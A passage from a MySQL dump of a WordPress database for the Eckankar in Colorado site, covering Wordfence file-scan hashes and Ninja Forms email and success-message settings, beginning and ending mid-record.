7327E992BED21B1B54E5200AD14A32,0xF51F41C742AA8B6D89F871FE91B741EC7A9CED695A75FBC3C7F514DB5C908ED7,'',0,'?'),(0x460DBA78D3777EDB0DDCB1B4E71B0AA6,'wp-includes/widgets/class-wp-widget-search.php','/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-search.php',1,0x00000000000000000000000000000000,0x928F01B44910D55334BE266B07FBEB44,0xEB1391B0E8206975D2CD361023498342338366D841FD115C0A3C57A0504141A3,'',0,'?'),(0xA22D895B6970F99C055C5E98D8F3C15D,'wp-includes/widgets/class-wp-widget-tag-cloud.php','/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php',1,0x00000000000000000000000000000000,0x8D69F46C94C2B9DC2BD058C0975ADC9A,0x7015AD5E42AD92F3011026B883FC0BD5D11CF3AC524FAD1DD6DE8E0818FD4400,'',0,'?'),(0x9D0019C920899F6B7E8219A35535540F,'wp-includes/widgets/class-wp-widget-text.php','/home/eckank5/public_html/wp-includes/widgets/class-wp-widget-text.php',1,0x00000000000000000000000000000000,0xF594AA0AF96447D6BC1C6B8ED90291DC,0x384F68BAAAD52B018244D0AECF65E6C408F63AE019242084F924C562602EB421,'',0,'?'),(0x53DB0E1CCA26EB617A38F64AD8B639A7,'wp-includes/widgets.php','/home/eckank5/public_html/wp-includes/widgets.php',1,0x00000000000000000000000000000000,0x9442A57866B9EA949A4B92A7D3603DBF,0x43A9243A78A734AA0556A5D6C750CB715A88E5E5668D8FA9395EEBB6FF612C0E,'',0,'?'),(0x4CC2118A651FA17422706328099265C7,'wp-includes/wp-db.php','/home/eckank5/public_html/wp-includes/wp-db.php',1,0x00000000000000000000000000000000,0x8F71CA619566E48071402E9D52BCD16F,0x88745C024BBC28C9AECB58CE278CB4B75BE71DAA2614E8C9786CE2F2A7141CA0,'',0,'?'),(0x28EF5EA6334E12BD9AA99391A2330812,'wp-includes/wp-diff.php','/home/eckank5/public_html/wp-includes/wp-diff.php',1,0x00000000000000000000000000000000,0x2091C92D78F1953CC47A5EA457657412,0x01FC61FFDB3B98C9BAB31BE42A325AB99C66319BF222A70AB04E747E9F3E8285,'',0,'?'),(0x9AFF995E90078F27BD7188C2EE3085EA,'wp-links-opml.php','/home/eckank5/public_html/wp-links-opml.php',1,0x00000000000000000000000000000000,0xC5FDA20D5735742C067DC1228D0ED7AB,0x0CC27F52797378FC4C39C6E2FEEF352299435ADECC9CFDF43935BAE220183BA7,'',0,'?'),(0x8F249D811BBBC0AA6AB6589E5D29443A,'wp-load.php','/home/eckank5/public_html/wp-load.php',1,0x00000000000000000000000000000000,0x615C6055EB7A432170F47DA57DB57D4F,0x036A43FF76A2A83A1AC6D46973F2FCDC856DAEED39C70DCAF493507646CEE097,'',0,'?'),(0xDD11BA0D00464AC8E49642E1DE65E712,'wp-login.php','/home/eckank5/public_html/wp-login.php',1,0x00000000000000000000000000000000,0x3CFE32209A71CC6D006EA92B408316B2,0xE25F879E2E0E2D3170D341719AE1AD05A9EADE80AC6D0A71B2EE06B0396EBEDC,'',0,'?'),(0xB48333A0542E5E9DC6993CDE0FF7F814,'wp-mail.php','/home/eckank5/public_html/wp-mail.php',1,0x00000000000000000000000000000000,0x5BD085402A4A6577BC717A227F630254,0x565E5BF1E93CFC56FBEB4D58EF91BE398B5B171F51A030C2098FB33882816C8B,'',0,'?'),(0x3B31D18B2312C1595F4E0F1C84A574F7,'wp-settings.php','/home/eckank5/public_html/wp-settings.php',1,0x00000000000000000000000000000000,0xEBFE13B18A78FC6B7F6FE18E5A340F61,0x96651A9547CB0CE13A3149B2BBE3F2BF652889A65CA56FAB8465FF8E60F46DBB,'',0,'?'),(0x168C1C2C903423A28528E7230C170614,'wp-signup.php','/home/eckank5/public_html/wp-signup.php',1,0x00000000000000000000000000000000,0xE95F8AB73EA60F1ADB3FA682A4FC7EBE,0xDB1DFD213CE8E3667DE396534E727D26E2FE180F5169A45C823DA20A55F5F25E,'',0,'?'),(0x6FE3AE9A2D01D73B3F583A8FFB70D2A1,'wp-trackback.php','/home/eckank5/public_html/wp-trackback.php',1,0x00000000000000000000000000000000,0xDB73D053EC325360711C79192BE83C6C,0x2E482EB9E094C91E1D248EA8977DED595FC87FEC1D208EEC008BD0CED430FE21,'',0,'?'),(0x34DA829CD94C24BC2C4B5B9C75CCE284,'xmlrpc.php','/home/eckank5/public_html/xmlrpc.php',1,0x00000000000000000000000000000000,0xA87B1EB9D10B90B0813DDFCF9E196B30,0x3464194CAC59EF656B7FCB41021548B537B27A88F669FD48470CE1983F464C99,'',0,'?');
/*!40000 ALTER TABLE `wpcl_wffilemods` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wffilemods` with 17632 row(s)
--

--
-- Table structure for table `wpcl_nf3_action_meta`
--

DROP TABLE IF EXISTS `wpcl_nf3_action_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_nf3_action_meta` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL,
  `key` longtext NOT NULL,
  `value` longtext DEFAULT NULL,
  `meta_key` longtext DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=7797 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_nf3_action_meta`
--

LOCK TABLES `wpcl_nf3_action_meta` WRITE;
/*!40000 ALTER TABLE `wpcl_nf3_action_meta` DISABLE KEYS */;
INSERT INTO `wpcl_nf3_action_meta` VALUES (1,1,'objectType','Action','objectType','Action'),(2,1,'objectDomain','actions','objectDomain','actions'),(3,1,'editActive','','editActive',''),(4,1,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(5,1,'payment_gateways','','payment_gateways',''),(6,1,'payment_total','','payment_total',''),(7,1,'tag','','tag',''),(8,1,'to','','to',''),(9,1,'email_subject','','email_subject',''),(10,1,'email_message','','email_message',''),(11,1,'from_name','','from_name',''),(12,1,'from_address','','from_address',''),(13,1,'reply_to','','reply_to',''),(14,1,'email_format','html','email_format','html'),(15,1,'cc','','cc',''),(16,1,'bcc','','bcc',''),(17,1,'attach_csv','','attach_csv',''),(18,1,'redirect_url','','redirect_url',''),(19,1,'email_message_plain','','email_message_plain',''),(20,2,'to','{field:email}','to','{field:email}'),(21,2,'subject','This is an email action.','subject','This is an email action.'),(22,2,'message','Hello, Ninja Forms!','message','Hello, Ninja Forms!'),(23,2,'objectType','Action','objectType','Action'),(24,2,'objectDomain','actions','objectDomain','actions'),(25,2,'editActive','','editActive',''),(26,2,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(27,2,'payment_gateways','','payment_gateways',''),(28,2,'payment_total','','payment_total',''),(29,2,'tag','','tag',''),(30,2,'email_subject','Submission Confirmation ','email_subject','Submission Confirmation '),(31,2,'email_message','<p>{all_fields_table}<br></p>','email_message','<p>{all_fields_table}<br></p>'),(32,2,'from_name','','from_name',''),(33,2,'from_address','','from_address',''),(34,2,'reply_to','','reply_to',''),(35,2,'email_format','html','email_format','html'),(36,2,'cc','','cc',''),(37,2,'bcc','','bcc',''),(38,2,'attach_csv','','attach_csv',''),(39,2,'email_message_plain','','email_message_plain',''),(40,3,'objectType','Action','objectType','Action'),(41,3,'objectDomain','actions','objectDomain','actions'),(42,3,'editActive','','editActive',''),(43,3,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(44,3,'payment_gateways','','payment_gateways',''),(45,3,'payment_total','','payment_total',''),(46,3,'tag','','tag',''),(47,3,'to','{system:admin_email}','to','{system:admin_email}'),(48,3,'email_subject','New message from {field:name}','email_subject','New message from {field:name}'),(49,3,'email_message','<p>{field:message}</p><p>-{field:name} ( {field:email} )</p>','email_message','<p>{field:message}</p><p>-{field:name} ( {field:email} )</p>'),(50,3,'from_name','','from_name',''),(51,3,'from_address','','from_address',''),(52,3,'reply_to','{field:email}','reply_to','{field:email}'),(53,3,'email_format','html','email_format','html'),(54,3,'cc','','cc',''),(55,3,'bcc','','bcc',''),(56,3,'attach_csv','0','attach_csv','0'),(57,3,'email_message_plain','','email_message_plain',''),(58,4,'message','Thank you {field:name} for filling out my form!','message','Thank you {field:name} for filling out my form!'),(59,4,'objectType','Action','objectType','Action'),(60,4,'objectDomain','actions','objectDomain','actions'),(61,4,'editActive','','editActive',''),(62,4,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(63,4,'payment_gateways','','payment_gateways',''),(64,4,'payment_total','','payment_total',''),(65,4,'tag','','tag',''),(66,4,'to','','to',''),(67,4,'email_subject','','email_subject',''),(68,4,'email_message','','email_message',''),(69,4,'from_name','','from_name',''),(70,4,'from_address','','from_address',''),(71,4,'reply_to','','reply_to',''),(72,4,'email_format','html','email_format','html'),(73,4,'cc','','cc',''),(74,4,'bcc','','bcc',''),(75,4,'attach_csv','','attach_csv',''),(76,4,'redirect_url','','redirect_url',''),(77,4,'success_msg','<p>Form submitted successfully.</p><p>A confirmation email was sent to {field:email}.</p>','success_msg','<p>Form submitted successfully.</p><p>A confirmation email was sent to {field:email}.</p>'),(78,4,'email_message_plain','','email_message_plain',''),(79,5,'title','','title',''),(80,5,'key','','key',''),(81,5,'type','save','type','save'),(82,5,'active','1','active','1'),(83,5,'created_at','2018-01-03 11:44:32','created_at','2018-01-03 11:44:32'),(84,5,'label','Save Form','label','Save Form'),(85,5,'objectType','Action','objectType','Action'),(86,5,'objectDomain','actions','objectDomain','actions'),(87,5,'editActive','','editActive',''),(88,5,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(89,5,'payment_gateways','','payment_gateways',''),(90,5,'payment_total','0','payment_total','0'),(91,5,'tag','','tag',''),(92,5,'to','{wp:admin_email}','to','{wp:admin_email}'),(93,5,'reply_to','','reply_to',''),(94,5,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(95,5,'email_message','{fields_table}','email_message','{fields_table}'),(96,5,'email_message_plain','','email_message_plain',''),(97,5,'from_name','','from_name',''),(98,5,'from_address','','from_address',''),(99,5,'email_format','html','email_format','html'),(100,5,'cc','','cc',''),(101,5,'bcc','','bcc',''),(102,5,'redirect_url','','redirect_url',''),(103,5,'parent_id','2','parent_id','2'),(104,6,'title','','title',''),(105,6,'key','','key',''),(106,6,'type','email','type','email'),(107,6,'active','1','active','1'),(108,6,'created_at','2018-01-03 11:44:32','created_at','2018-01-03 11:44:32'),(109,6,'date_updated','2016-01-15','date_updated','2016-01-15'),(110,6,'attach_csv','0','attach_csv','0'),(111,6,'email_format','html','email_format','html'),(112,6,'reply_to','','reply_to',''),(113,6,'cc','','cc',''),(114,6,'bcc','','bcc',''),(115,6,'redirect_url','','redirect_url',''),(116,6,'success_msg','','success_msg',''),(117,6,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(118,6,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(119,6,'to','{field:email_144}','to','{field:email_144}'),(120,6,'email_subject','Loveland Initiators and ESAâs','email_subject','Loveland Initiators and ESAâs'),(121,6,'email_message','<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br /><br />\n                                \"><br><br>\n<h1>Eckankar In Colorado</h1><br><br>\n</td>\n<td>&nbsp;</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p><strong>Hello {field:textbox_142},</strong></p><br><br>\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Loveland ECK Leadership Communications team.</p><br><br>\n<p>Here is a copy of the information that you have submitted:</p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br /><br />\n                                \"><br><br>\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_142}<br><br><br>\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_143}<br><br><br>\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_144}<br><br><br>\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_145}</span><br><br><br>\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_146}<br><br><br>\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166666321}</span></p><br><br>\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_150}</span></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br><br>\n<br><br>\nIf you have any questions regarding the origin of this form, please feel free to contact the<br><br><br>\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>\n<br><br>\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br>\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<p>&nbsp;</p>','email_message','<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br /><br />\n                                \"><br><br>\n<h1>Eckankar In Colorado</h1><br><br>\n</td>\n<td>&nbsp;</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p><strong>Hello {field:textbox_142},</strong></p><br><br>\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Loveland ECK Leadership Communications team.</p><br><br>\n<p>Here is a copy of the information that you have submitted:</p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br /><br />\n                                \"><br><br>\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_142}<br><br><br>\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_143}<br><br><br>\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_144}<br><br><br>\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_145}</span><br><br><br>\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_146}<br><br><br>\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166666321}</span></p><br><br>\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_150}</span></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><br><br>\n<br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><br><br>\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br><br>\n<br><br>\nIf you have any questions regarding the origin of this form, please feel free to contact the<br><br><br>\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>\n<br><br>\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br><br>\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n</td>\n</tr>\n</tbody>\n</table><br><br>\n<p>&nbsp;</p>'),(122,6,'label','Send copy to user','label','Send copy to user'),(123,6,'objectType','Action','objectType','Action'),(124,6,'objectDomain','actions','objectDomain','actions'),(125,6,'editActive','','editActive',''),(126,6,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(127,6,'payment_gateways','','payment_gateways',''),(128,6,'payment_total','0','payment_total','0'),(129,6,'tag','','tag',''),(130,6,'email_message_plain','','email_message_plain',''),(131,6,'parent_id','2','parent_id','2'),(132,7,'title','','title',''),(133,7,'key','','key',''),(134,7,'type','successmessage','type','successmessage'),(135,7,'active','1','active','1'),(136,7,'created_at','2018-01-03 11:44:32','created_at','2018-01-03 11:44:32'),(137,7,'date_updated','2016-01-15','date_updated','2016-01-15'),(138,7,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>'),(139,7,'from_name','','from_name',''),(140,7,'from_address','','from_address',''),(141,7,'to','{wp:admin_email}','to','{wp:admin_email}'),(142,7,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(143,7,'email_message','{fields_table}','email_message','{fields_table}'),(144,7,'attach_csv','0','attach_csv','0'),(145,7,'email_format','html','email_format','html'),(146,7,'reply_to','','reply_to',''),(147,7,'cc','','cc',''),(148,7,'bcc','','bcc',''),(149,7,'redirect_url','','redirect_url',''),(150,7,'label','Success Message','label','Success Message'),(151,7,'objectType','Action','objectType','Action'),(152,7,'objectDomain','actions','objectDomain','actions'),(153,7,'editActive','','editActive',''),(154,7,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(155,7,'payment_gateways','','payment_gateways',''),(156,7,'payment_total','0','payment_total','0'),(157,7,'tag','','tag',''),(158,7,'email_message_plain','','email_message_plain',''),(159,7,'parent_id','2','parent_id','2'),(160,8,'title','','title',''),(161,8,'key','','key',''),(162,8,'type','email','type','email'),(163,8,'active','1','active','1'),(164,8,'created_at','2018-01-03 11:44:32','created_at','2018-01-03 11:44:32'),(165,8,'date_updated','2016-01-19','date_updated','2016-01-19'),(166,8,'from_name','Loveland Initiators and ESAâs','from_name','Loveland Initiators and ESAâs'),(167,8,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(168,8,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(169,8,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record 